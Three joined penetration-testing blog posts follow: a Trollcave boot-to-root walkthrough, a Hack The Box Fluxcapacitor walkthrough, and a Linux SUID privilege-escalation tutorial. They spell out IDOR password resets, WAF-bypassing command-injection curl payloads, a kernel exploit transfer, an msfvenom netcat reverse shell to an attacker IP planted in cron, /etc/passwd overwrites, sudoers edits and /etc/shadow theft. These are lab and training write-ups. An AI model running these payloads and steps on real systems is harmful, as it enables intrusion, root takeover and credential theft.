Hack the Trollcave VM (Boot to Root)

Hello friends! Today we are going to take another CTF challenge known as Trollcave. The credit for making this vm machine goes to “David Yates” and it is another boot to root challenge in which our goal is to gain root access and capture the flag to complete the challenge. You can download this VM from here.

Let’s Breach!!!

Let's start with getting to know the IP of VM (Here, I have it at 192.168.1.124 but you will have to find your own)

netdiscover

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -A 192.168.1.124

Awesome!! Nmap has dumped the details of services running on open port 22 and 80.

Knowing port 80 is open in victim's network I preferred to explore his IP in a browser. At first glance, we saw three tabs Home, login and Register.

Then we scroll down the page and look at Ruby gem and found that this site is based on Ruby on rails. And on the right side we saw two categories i.e. 0nline users and Newest users, when we click on “xer” a new web page gets opened.

From its URL we perceived that user xer has user ID 17 and hence there must be any user between user ID 1 to 17.

So we manually replace id 17 from id 1 and found King’s page which was for superadmin account.

At its home page we read the post password reset by coderguy, represented by ruby gem for rail password reset and from Google we found default directory for password reset for reset. So we explored http://192.168.1.124/password_resets/new  and obtained password reset form.  Very first we try to reset superadmin password but unfortunately get failed, BUT successfully got the link for xer password reset.

Yeah!! It was Pretty Good to see a link for xer password reset, then we have copied that link.  

http://192.168.1.124/password_resets/edit.dphWuziPVk6ELBIQ0P-poQ?name=xer

And past the copied link in URL, then swap name=xer from king as given below, later entered a new password for superadmin (king), it is known as IDOR.

http://192.168.1.124/password_resets/edit.dphWuziPVk6ELBIQ0P-poQ?name=king

Well!!! On executing URL; it gives a message “password reset successfully” and then we logged in superadmin account.

Yippee!!! Finally, we logged in as superadmin and access admin console, we saw many tabs and apparently click on file manager.

Here we saw enable file upload option, and we enabled it so that we can upload any backdoor whenever we need to upload that.

Thus we start from uploading PHP backdoor but failed to upload, similarly, we tried so many backdoors such as ruby, C shell and many more but get failed each time. After so many attempts we successfully upload ssh RSA file.

To do so follow the below steps:

ssh-keygen -f rails

mv rails.pub authorized_keys

chmod 600 rails

 Here we have generated ssh RSA key file by the name of rails without a password and transferred rails.pub into authorized_keys and gave permission 600 for proper authentication.

Then upload the authorized_keys and add ../../../../../../home/rails/.ssh/authorized_keys path manually.

So after uploading SSH key, it was time to connect target’s machine through ssh key.

ssh -i rails rails@192.168.1.124

Awesome!! From below image, you can observe the target machine's tty shell.

Then we execute lsb_release -a command to know the version of the kernel and found 16.04. After then with the help of searchsploit found kernel exploit 44298.c for local privilege escalation.

At that moment we copied this exploit on Desktop and compiled it, now it was impossible to transfer the exploit using simple complied file, therefore, we need to encode it file into base64. You use below command to follow same steps.

cd Desktop

cp /usr/share/exploitdb/exploits/linux/local/44298.c .

gcc 44298.c -o kernel

base64 kernel

We copied the base64 encoded value then movie into target’s terminal where we created an empty file exploit.base64 with the help of nano and past above copied encode code.

nano exploit.base64

Far ahead decoded it in a new file as rootshell and give all permission to the decoded file. At last, we run the rootshell file to get root privilege.

cat exploit.base64 |base64 -d > rootshell

chmod u+x rootshell

./rootshell

id

cd /root

cat flag.txt

BINGO!!!! We got the root flag!!!

Hack the Box Challenge: Fluxcapacitor Walkthrough

Hello friends!! Today we are sharing our experience that can be helpful in solving new CTF challenge: Fluxcapacitor of Hack The Box. Solving this lab is not much easy, all you need is your web penetration testing skill to solve this challenge. This lab is designed to bypass Web Application Firewall (WAF) for exploiting OS command injection vulnerability in this machine.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

These labs are only available online, therefore, they have a static IP. Fluxcapacitor has IP: 10.10.10.69.

As we knew the initial stage is enumeration; therefore use nmap version scan for gathering target’s machine and running services information.

nmap -sV 10.10.10.69

So from its scanning result, it told us that port 80 is open for web services and also protected by web application firewall “superWAF”  thus we explored target IP in the web browser but found nothing interesting.

Then we look into its source code and saw an exciting comment which was pointing towards URL: /sync, and without wasting time we open /sync in URL.

LOL!!! It gave 403 forbidden error message and something openresty/1.13.6.1 then we looked into Google for any exploit related to this but failed to find any working exploit against it.

At the moment, we decided to use burp suite for intercepting our browser request. So after intercepting the Http request, the raw information is sent to the repeater.

Huhhhh!! It was responding same output as was in the web browser. Might be there would be some chances of WAF filter restriction on User-Agent such as Mozilla Firefox/5.0.

So we start scrutiny for User-Agent field by replacing original user-agent content from “raj” randomly. Finally!!! It gave current timestamp as disclosed in the comment found in the source code of the home page.

Now it was confirmed that there was SuperWAF filter against the user-agent field, therefore, we try to search its exploit in Google but we didn't find any particular exploit.  Nevertheless, Google gave a little hint for OS command injection and on the bases of that, we try few parameters within Http Header such as /sync?test=ls which response with the same timestamp every time. Hence we need to fuzz proper directory, therefore, we will use wfuzz in our next step.

So we use common.txt wordlist for URL brute force and execute below command.

wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.69/sync?FUZZ=ls -c --hh 19

It gave 403 response for payload “opt”; let’s try to opt after/sync and identify the response.

Now use ‘opt’ parameter to bypass WAF and execute ls command through it, HOWEVER again there is a trick to execute ls command. Because WAF will not allow you to perform OS command injection directly, therefore, it will be a little bit tougher to exploit it. But THANKS to medium.com, because I got the idea to bypass WAF for exploiting OS command injection which is known as string literal concatenation from this website, meaning that adjacent string literals are concatenated, without any operator.

We took help from that website which I have mentioned above and execute three commands: whoami, id, uname through curl as shown in image.

curl http://10.10.10.69/sync?opt=' whoami'

curl "http://10.10.10.69/sync?opt=' id'"

curl http://10.10.10.69/sync?opt=' u'n'ame -a'

Superb!! It was great to know that we have bypassed WAF successfully, but still the task is not completed yet.

Let’s seize the user.txt and root.txt file and finished this task. Hhhhhh!!!! Believe me, still, it is not easy to bypass WAF even if your goal is near. Seriously we put great efforts and at last found user.txt when executed below commands.

curl "http://10.10.10.69/sync?opt=' l's' /home'"

curl http://10.10.10.69/sync?opt=' l's' /home/Fl'uxC'apa'cit'orI'n'c'

curl "http://10.10.10.69/sync?opt=' c'at' /home/Fl'uxC'apa'cit'orI'n'c/u'ser'.'txt''"

Now the goal was root.txt file and taking a lesson from the previous experience I choose to run sudo -l command to check the sudo privileges of the current user.

curl http://10.10.10.69/sync?opt=' sudo -l'

Awesome!! It told us that we can run a script “monit” with root privileges without using password, which is inside /home/themiddle/ directory. Let’s open it with the help of cat command.

curl http://10.10.10.69/sync?opt=' c'at' /h'ome/themiddle/.monit''

After reading .monit file, we concluded that the script takes two parameter i.e. cmd string and base64 decoding which will match the conditions according to it and passes the final result to bash -c as parameter.

Hence it was clear that 1st parameter will match string “cmd” and 2nd will decode base64 value for that reason first we generated base64 value for /root/root.txt because we were well aware of the location of the root.txt file from our previous challenges.

echo "cat /root/root.txt" | base64

Now with the help of sudo privilege execute the command to gain root access and complete the task by grabbing root.txt

curl http://10.10.10.69/sync?opt=' sudo /h'ome/themiddle/.monit' cmd Y2F0IC9yb290L3Jvb3QudHh0Cg=='

HURRAYYYY!!! We hit the goal and successfully found the root.txt file.

Linux Privilege Escalation using SUID Binaries

In our previous article we have discussed “Privilege Escalation in Linux using etc/passwd file” and today we will learn “Privilege Escalation in Linux using SUID Permission.” While solving CTF challenges we always check suid permissions for any file or command for privilege escalation. It is very important to know what SUID is, how to set SUID and how SUID helps in privilege escalation. You can read our previous article where we had applied this trick for privilege escalation. Open the links given below:

Link 1:  Hack the Box Challenge: Bank Walkthrough

Link 2: Hack the Box Challenge: Haircut Walkthrough

Let’s Start with Theoretical Concept !!

As we all know in Linux everything is a file, including directories and devices which have permissions to allow or restrict three operations i.e. read/write/execute. So when you set permission for any file, you should be aware of Linux users to whom you are going allow or restrict all three permissions. Take a look at the following image.

Hence it is clear that the maximum number of bit is used to set permission for each user is 7, which is a combination of read (4) write (2) and execute (1) operation. For example, if you set chmod 755, then it will look like as rwxr-xr-x.

But when special permission is given to each user it becomes SUID, SGID and sticky bits. When extra bit “4” is set to user(Owner) it becomes SUID (Set user ID) and when bit “2” is set to group it becomes SGID (Set Group ID) and  if other users are allowed to create or delete any file inside a directory then sticky bits “1” is set to that directory.

What is SUID Permission?

SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Those files which have suid permissions run with higher privileges.  Assume we are accessing target system as a non-root user and we found suid bit enabled binaries, then those file/program/command can run with root privileges.

How to set suid?

Basically, you can change the permission of any file either using "Numerical" method or "Symbolic" method. As result, it will replace x from s as shown in below image which denotes especial execution permission with the higher privilege to a particular file/command. Since we are enabling SUID for Owner (user) therefore bit 4 or symbol s will be added before read/write/execution operation.

If you execute ls -al command with the file name and then you will observe symbol small ‘s’ as in above image then its means SUID bit is enabled for that file and it can be run with root privileges.

HOW SUID helps in privilege escalation?

In Linux, some of the existing binaries and commands can be used by non-root user to escalate privileges to root access if the SUID bit is enabled. There are some famous Linux/Unix executables commands that can let privilege escalation are: Bash, Cat, cp, echo, find, Less, More, Nano, Nmap, Vim.

Let's get into deep through practical work. First, create a user which should be not the sudo group user. Here we have added user “ignite” whose UID is 1001 and GID is 1001 and hence ignite is non-root user.

Privilege Escalation by Copy Command

If suid bit is enabled for cp command which is used to copy the data, then it can lead to privilege escalation to gain root access. For example, suppose you (system admin) want to give SUID permission for cp command. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which cp

ls -al /bin/cp

chmod u+s /bin/cp

1^st Method

On other hands start yours attacking machine and first compromise the target system and then move to privilege escalation phase. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then by using the following command you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

In above image, you can observe that it is showing so many files but we are interested in /bin/cp file. Because now we can copy /etc/password file for reading user list. Therefore I copy /passwd file inside HTML directory.

cp /etc/passwd /var/www/html

On other hands we have generated a new encrypted password: pass123 using OpenSSL passwd

We have copied /passwd file inside the web directory i.e. /var/www/html, therefore I can open it through the web browser then copied the entire content of /password file in a text file and after then we can add our own user with root UID, GID and directory.

In our previous article, we have already discussed how to add a user /etc/passwd using openssl passwd utility.

Run Python HTTP server for transferring our edited passwd file into target’s machine.

python -m SimpleHTTPServer 80

As we all know /tmp directory has all permission to create or delete any file, therefore, we have download our passwd file inside it.  Once it gets downloaded after then we copied the data of /tmp/passwd into /etc/passwd as result it will overwrite original passwd file.

cd /tmp

wget http://192.168.1.108/passwd

cp passwd /etc/passwd

With the help of tail command, we ensured that our user "hack" is either the part of /etc/passwd file. Since we have added our own user with root privileges let's get into the root directory.

su hack

whoami

And Yessssssss !! This is an incredible way to escalated root privilege.

2^nd Method

Similarly, we can also transfer our backdoor in target's system if SUID bit is enabled for cp command. Here we have generated natcat backdoor for reverse connect using msfvenom command.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.108 lport=1234 R

Then copy the above-highlighted code and paste in a text file by editing #!/bin/bash then ready to transfer it into target’s system, I have saved it as raj.sh.

Now we all are aware of Linux crontab utility that runs file hourly, daily, weekly and monthly and thus I copied raj.sh inside /etc/cron.hourly. Hence it will run raj.sh file after one hour.

cp raj.sh /etc/cron.hourly/

ls -al /etc/cron.hourly/

Other hands we started Netcat listener in a new terminal and as the hour past it gives reverse connect of target’s system with root privileges.

Hence we saw how a single cp command can lead to privilege escalation if SUID bit is ON. You can try your own way to escalated root privilege using cp command.

Privilege Escalation by Using Find Command

Similarly, we can escalate root privilege if SUID bit is ON for find command. For example, suppose you (system admin) want to give SUID permission for Find command. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which find

ls -al /usr/bin/find

chmod u+s /usr/bin/find

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for find command which means we can execute any command within find command. To do so first we create an empty file “raj” and then run whoami command as shown below.

touch raj

find raj -exec “whoami” \;

If an attacker successfully enumerated SUID bit for /usr/bin/find then it will allow him to execute any malicious command such netcat bin/bash shell or may fetch important system information for privilege escalation.

Privilege Escalation by Using Vim

Similarly, we can escalate root privilege if SUID bit is ON for Vim editor. For example, suppose you (system admin) want to give SUID permission for Vim editor. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which vim

ls -al /usr/bin/vim

ls -al /usr/bin/alternatives/vim

chmod u+s /usr/bin/vim.basic

You will found vim.basic through symlinking as shown in the below image.

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command you can enumerate all binaries who's having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for /usr/bin/vim.basic and hence now we can edit any file which through vim that can be editable only by sudo or root user.

As we know ignite is non-root user who has least permissions, since vim has SUID permission, therefore, we can edit the sudoers file through it and can change permissions for user “ignite”. So we open sudoers file by typing visudo command and give all permission to user “ignite” as shown in the image.

ignite   ALL=(ALL:ALL) ALL

Now let access root directory as shown in below image.

sudo -l

sudo bash

id

Great!! This trick also work superbly for privilege escalations.

Privilege Escalation by Running Script

There are maximum chances to get any kind of script for the system or program call, it can be any script either PHP, Python or C language script. Suppose you (system admin) want to give SUID permission to a C language script which will provide bash shell on execution.

So here we have coded a c program which will call system for bash shell and saved it as “asroot.c”.

Then create a rootshell directory inside /bin directory and copied the asroot.c file in rootshell directory then run gcc compiler for compilation.

mkdir /bin/rootshell

cd /bin/rootshell

cp /home/raj/Desktop/asroot.c .

ls

gcc asroot.c -o shell

chmod u+s shell

ls -al shell

Now again compromise target’s system and use find command to identify binaries having SUID permission.

 find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for so many binary files but we are interested in /bin/rootshell/shell. So we move into /bin/rootshell directory and run the script “shell” as result we get root access as shown below.

cd /bin/rootshell

./shell

Id

Thus we saw how we can escalate root privilege if SUID bit is enabled for any script, although it is not possible to get such script which calls bash shell but if you found any script with SUID permission then using above techniques you can modify the content of that script to get the bash shell.

Privilege Escalation by Using Nano

Similarly, we can escalate root privilege if SUID bit is ON for nano editor. For example, suppose you (system admin) want to give SUID permission for nano editor. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which vim

ls -al /bin/nano

chmod u+s /bin/nano

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for /bin/nano and now let’s open /etc/passwd file to edit own user as done above by using openssl passwd.

On other hands I have generated a new encrypted password: 123 using openssl passwd

Now open passwd file with nano editor and add your own user as done above. Here you can observe I have created demo user with encrypted password in victim’s system.

nano /etc/password

Since we have added our own user with root privileges let’s get into root directory.

su demo

id

2^nd Method

If suid bit is enabled for /bin/nano then we can steal the password from inside /etc/shadow file. So after compromising target’s machine we had opened shadow file in nano editor and copy the encrypted password set for user: raj.

Now paste above copy code into a text file and saved as hash on the desktop, after then used john the ripper to decode it as shown below. It has given raj: 123 as password, now try to login into target's system through raj account.

So Today we have demonstrated how the SUID permission can lead to privilege escalation even if it is allow to a normal copy, cat, nano, vim and so commands and programs.